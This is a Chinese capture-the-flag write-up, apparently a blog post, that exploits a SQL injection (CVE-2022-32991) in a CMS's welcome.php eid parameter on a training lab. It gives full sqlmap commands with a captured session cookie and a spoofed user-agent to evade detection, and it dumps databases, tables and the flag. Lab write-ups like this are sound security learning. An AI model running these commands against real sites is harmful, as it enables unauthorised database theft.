春秋云镜——CVE-2022-32991

题型分析

题目

请添加图片描述

靶场介绍说是该CMS的welcome.php中存在SQL注入攻击,给到的范围是SQL注入

CVE-2022-32991介绍

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

给到提示注入点是welcome.php的eid参数,因此需要在welcome.php的界面下关注get请求的eid参数部分

渗透测试

情报分析

  1. 打开页面,是一个注册登录的界面
    在这里插入图片描述

    可以先熟悉其网站的功能,不要直接去找注入点。因此可以先注册一个账户去看看登录后的界面样子

  2. 利用注册的账户进行登录后会发现一个管理页面

    在这里插入图片描述

    随机点击下面的start会发现页面跳转过后的URL会出现eid的字段,此时找到了满足CVE-2022-32991的两个条件,接下来就是直接利用漏洞进行SQL注入攻击了

    外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

漏洞利用——SQL注入

  1. 利用BP进行抓包记录sqlmap所需要的参数信息

    • 发现这个页面还设置了cookie验证

      --cookie="PHPSESSID=5vjmqngb82fct3nea1j2ggbp8k"
      

      外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

      既然有cookie身份认证,那么就需要在sqlmap中写入

    • 同时还需要添加UA字段的内容使得sqlmap绕过客户端验证,否则可能会被识别到明显的sqlmap客户端标识,从而导致攻击的中断

      --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0"
      
  2. sqlmap爆库

sqlmap -u "http://eci-2ze002vhgulcj71p2uui.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0" --cookie="PHPSESSID=5vjmqngb82fct3nea1j2ggbp8k" --batch --dbs

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

  1. sqlmap爆表
sqlmap -u "http://eci-2ze002vhgulcj71p2uui.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0" --cookie="PHPSESSID=5vjmqngb82fct3nea1j2ggbp8k" --batch -D "ctf" --tables

在这里插入图片描述

  1. sqlmap爆列
sqlmap -u "http://eci-2ze002vhgulcj71p2uui.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0" --cookie="PHPSESSID=5vjmqngb82fct3nea1j2ggbp8k" --batch -D "ctf" -T "flag" --columns

在这里插入图片描述

  1. 拿到flag
sqlmap -u "http://eci-2ze002vhgulcj71p2uui.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --user-agent="Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0" --cookie="PHPSESSID=5vjmqngb82fct3nea1j2ggbp8k" --batch -D "ctf" -T "flag" -C "flag" --dump

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

muzzert

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值